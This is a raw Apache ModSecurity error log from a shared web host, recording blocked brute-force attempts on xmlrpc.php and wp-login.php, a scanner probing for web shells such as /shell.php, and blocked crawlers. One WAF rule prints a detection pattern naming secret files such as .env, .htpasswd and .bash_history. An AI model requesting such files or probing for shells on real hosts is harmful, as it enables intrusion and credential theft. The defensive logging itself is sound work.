[Tue May 26 19:26:48.067988 2026] [security2:error] [pid 49598:tid 49782] [client 176.65.139.231:34218] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rsmsi.svijaykumar.in"] [uri "/.env"] [unique_id "ahWmoOzJzkdc0WtdrwtR8gAAALs"]
[Tue May 26 19:26:48.400320 2026] [security2:error] [pid 49598:tid 49833] [client 20.192.3.167:1265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ss.php"] [unique_id "ahWmoOzJzkdc0WtdrwtR-gAAAO4"]
[Tue May 26 19:26:48.419806 2026] [security2:error] [pid 49598:tid 49832] [client 193.19.109.30:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR1QAA7Vw"]
[Tue May 26 19:26:48.488125 2026] [security2:error] [pid 49598:tid 49843] [client 72.14.92.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmoOzJzkdc0WtdrwtSAQAAAPg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:26:48.751178 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:26665] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmoOzJzkdc0WtdrwtSBwAAAKE"]
[Tue May 26 19:26:48.751306 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:26665] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmoOzJzkdc0WtdrwtSBwAAAKE"]
[Tue May 26 19:26:49.422419 2026] [security2:error] [pid 49598:tid 49762] [client 20.192.3.167:11510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/sts.php"] [unique_id "ahWmoezJzkdc0WtdrwtSHQAAAKc"]
[Tue May 26 19:26:49.516264 2026] [security2:error] [pid 49598:tid 49745] [client 91.245.236.124:47409] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmoezJzkdc0WtdrwtSIQAAAJY"]
[Tue May 26 19:26:49.516377 2026] [security2:error] [pid 49598:tid 49745] [client 91.245.236.124:47409] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmoezJzkdc0WtdrwtSIQAAAJY"]
[Tue May 26 19:26:49.639432 2026] [security2:error] [pid 49598:tid 49757] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmoezJzkdc0WtdrwtSEQAAAKI"]
[Tue May 26 19:26:50.012002 2026] [security2:error] [pid 49598:tid 49740] [client 72.14.92.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmoezJzkdc0WtdrwtSLgAAAJE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1269060&moderation-hash=2686f0e0ed09014963caab940cba81a0
[Tue May 26 19:26:50.535648 2026] [security2:error] [pid 49598:tid 49821] [client 20.192.3.167:9026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/shell.php"] [unique_id "ahWmouzJzkdc0WtdrwtSRwAAAOI"]
[Tue May 26 19:26:50.783614 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:35957] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmouzJzkdc0WtdrwtSNQAAANI"]
[Tue May 26 19:26:50.783765 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:35957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmouzJzkdc0WtdrwtSNQAAANI"]
[Tue May 26 19:26:50.878679 2026] [security2:error] [pid 49598:tid 49828] [client 83.50.252.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmouzJzkdc0WtdrwtSQAAAAOk"]
[Tue May 26 19:26:51.393014 2026] [security2:error] [pid 49598:tid 49820] [client 114.119.138.130:27571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-wide/"] [unique_id "ahWmo-zJzkdc0WtdrwtSYwAAAOE"], referer: https://premiumproxy.net/check-reverse-domain-ip-lookup/brian-day.com
[Tue May 26 19:26:51.509273 2026] [security2:error] [pid 49598:tid 49822] [client 20.192.3.167:6565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/setup-config.php"] [unique_id "ahWmo-zJzkdc0WtdrwtSbAAAAOM"]
[Tue May 26 19:26:51.559306 2026] [security2:error] [pid 49598:tid 49761] [client 91.245.236.124:54767] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmo-zJzkdc0WtdrwtScwAAAKY"]
[Tue May 26 19:26:51.559395 2026] [security2:error] [pid 49598:tid 49761] [client 91.245.236.124:54767] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmo-zJzkdc0WtdrwtScwAAAKY"]
[Tue May 26 19:26:51.951597 2026] [security2:error] [pid 49598:tid 49601] [remote 92.205.188.156:47804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmo-zJzkdc0WtdrwtSdwAAtwI"]
[Tue May 26 19:26:52.000937 2026] [security2:error] [pid 49598:tid 49783] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmo-zJzkdc0WtdrwtSdQAAALw"]
[Tue May 26 19:26:52.338202 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:33947] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpOzJzkdc0WtdrwtSjwAAAOc"]
[Tue May 26 19:26:52.338336 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:33947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpOzJzkdc0WtdrwtSjwAAAOc"]
[Tue May 26 19:26:52.508972 2026] [security2:error] [pid 49598:tid 49840] [client 20.192.3.167:9065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/t.php"] [unique_id "ahWmpOzJzkdc0WtdrwtSlgAAAPU"]
[Tue May 26 19:26:52.512007 2026] [security2:error] [pid 49598:tid 49807] [client 216.244.66.241:38482] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWmpOzJzkdc0WtdrwtSlwAAANQ"]
[Tue May 26 19:26:52.512140 2026] [security2:error] [pid 49598:tid 49807] [client 216.244.66.241:38482] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWmpOzJzkdc0WtdrwtSlwAAANQ"]
[Tue May 26 19:26:52.512838 2026] [security2:error] [pid 49598:tid 49841] [client 216.244.66.241:38486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWmpOzJzkdc0WtdrwtSmAAAAPY"]
[Tue May 26 19:26:52.512983 2026] [security2:error] [pid 49598:tid 49841] [client 216.244.66.241:38486] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWmpOzJzkdc0WtdrwtSmAAAAPY"]
[Tue May 26 19:26:53.114201 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:64069] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpezJzkdc0WtdrwtSpgAAAJs"]
[Tue May 26 19:26:53.114339 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:64069] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpezJzkdc0WtdrwtSpgAAAJs"]
[Tue May 26 19:26:53.196304 2026] [security2:error] [pid 49598:tid 49782] [client 72.14.92.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmpezJzkdc0WtdrwtSqQAAALs"], referer: https://anujtradingco.com
[Tue May 26 19:26:53.782044 2026] [security2:error] [pid 49598:tid 49832] [client 20.192.3.167:12036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/up.php"] [unique_id "ahWmpezJzkdc0WtdrwtSzwAAAO0"]
[Tue May 26 19:26:53.787191 2026] [core:error] [pid 49598:tid 49743] [client 205.210.31.97:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:26:53.787205 2026] [core:error] [pid 49598:tid 49743] [client 205.210.31.97:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:26:53.878510 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:54013] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpezJzkdc0WtdrwtS0QAAAPo"]
[Tue May 26 19:26:53.878630 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:54013] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpezJzkdc0WtdrwtS0QAAAPo"]
[Tue May 26 19:26:54.165206 2026] [security2:error] [pid 49598:tid 49854] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmpezJzkdc0WtdrwtSyAAAAQM"]
[Tue May 26 19:26:54.594491 2026] [autoindex:error] [pid 49598:tid 49742] [client 43.157.62.101:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:26:54.638342 2026] [security2:error] [pid 49598:tid 49851] [client 91.245.236.124:14463] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpuzJzkdc0WtdrwtS8QAAAQA"]
[Tue May 26 19:26:54.638453 2026] [security2:error] [pid 49598:tid 49851] [client 91.245.236.124:14463] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmpuzJzkdc0WtdrwtS8QAAAQA"]
[Tue May 26 19:26:54.827049 2026] [security2:error] [pid 49598:tid 49739] [client 20.192.3.167:8119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ultra.php"] [unique_id "ahWmpuzJzkdc0WtdrwtS9QAAAJA"]
[Tue May 26 19:26:55.402826 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:17899] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmp-zJzkdc0WtdrwtTDAAAAJg"]
[Tue May 26 19:26:55.402993 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:17899] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmp-zJzkdc0WtdrwtTDAAAAJg"]
[Tue May 26 19:26:55.747463 2026] [security2:error] [pid 49598:tid 49834] [client 20.192.3.167:12039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/vv.php"] [unique_id "ahWmp-zJzkdc0WtdrwtTFQAAAO8"]
[Tue May 26 19:26:56.166603 2026] [security2:error] [pid 49598:tid 49757] [client 91.245.236.124:60187] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmqOzJzkdc0WtdrwtTKQAAAKI"]
[Tue May 26 19:26:56.166726 2026] [security2:error] [pid 49598:tid 49757] [client 91.245.236.124:60187] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmqOzJzkdc0WtdrwtTKQAAAKI"]
[Tue May 26 19:26:56.491306 2026] [security2:error] [pid 49598:tid 49803] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmqOzJzkdc0WtdrwtTIQAAANA"]
[Tue May 26 19:26:56.753679 2026] [security2:error] [pid 49598:tid 49833] [client 20.192.3.167:14743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/V5.php"] [unique_id "ahWmqOzJzkdc0WtdrwtTQQAAAO4"]
[Tue May 26 19:26:56.931867 2026] [security2:error] [pid 49598:tid 49795] [client 91.245.236.124:30487] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmqOzJzkdc0WtdrwtTSgAAAMg"]
[Tue May 26 19:26:56.931965 2026] [security2:error] [pid 49598:tid 49795] [client 91.245.236.124:30487] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmqOzJzkdc0WtdrwtTSgAAAMg"]
[Tue May 26 19:26:57.696140 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:54037] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmqezJzkdc0WtdrwtTZQAAANs"]
[Tue May 26 19:26:57.696281 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:54037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmqezJzkdc0WtdrwtTZQAAANs"]
[Tue May 26 19:26:57.839255 2026] [security2:error] [pid 49598:tid 49745] [client 20.192.3.167:8795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-user.php"] [unique_id "ahWmqezJzkdc0WtdrwtTZwAAAJY"]
[Tue May 26 19:26:58.471656 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:45785] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmquzJzkdc0WtdrwtTeQAAAKU"]
[Tue May 26 19:26:58.471864 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:45785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmquzJzkdc0WtdrwtTeQAAAKU"]
[Tue May 26 19:26:58.816526 2026] [security2:error] [pid 49598:tid 49826] [client 149.20.240.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmquzJzkdc0WtdrwtTgAAAAOc"], referer: https://www.anujtradingco.com/
[Tue May 26 19:26:58.849283 2026] [security2:error] [pid 49598:tid 49743] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmquzJzkdc0WtdrwtTeAAAAJQ"]
[Tue May 26 19:26:58.970565 2026] [security2:error] [pid 49598:tid 49846] [client 20.192.3.167:8126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-blog.php"] [unique_id "ahWmquzJzkdc0WtdrwtTiAAAAPs"]
[Tue May 26 19:26:59.250968 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:25465] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmq-zJzkdc0WtdrwtTigAAAK4"]
[Tue May 26 19:26:59.251111 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:25465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmq-zJzkdc0WtdrwtTigAAAK4"]
[Tue May 26 19:27:00.020001 2026] [security2:error] [pid 49598:tid 49763] [client 20.192.3.167:3359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp.php"] [unique_id "ahWmrOzJzkdc0WtdrwtToAAAAKg"]
[Tue May 26 19:27:00.024002 2026] [security2:error] [pid 49598:tid 49773] [client 91.245.236.124:19625] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmrOzJzkdc0WtdrwtToQAAALI"]
[Tue May 26 19:27:00.024097 2026] [security2:error] [pid 49598:tid 49773] [client 91.245.236.124:19625] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmrOzJzkdc0WtdrwtToQAAALI"]
[Tue May 26 19:27:00.271064 2026] [security2:error] [pid 49598:tid 49790] [client 149.20.240.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmrOzJzkdc0WtdrwtTpQAAAMM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227654&moderation-hash=8715c559f2144bd8b23e288aa5bf6c79
[Tue May 26 19:27:00.439115 2026] [security2:error] [pid 49598:tid 49737] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmrOzJzkdc0WtdrwtTogAAAI4"]
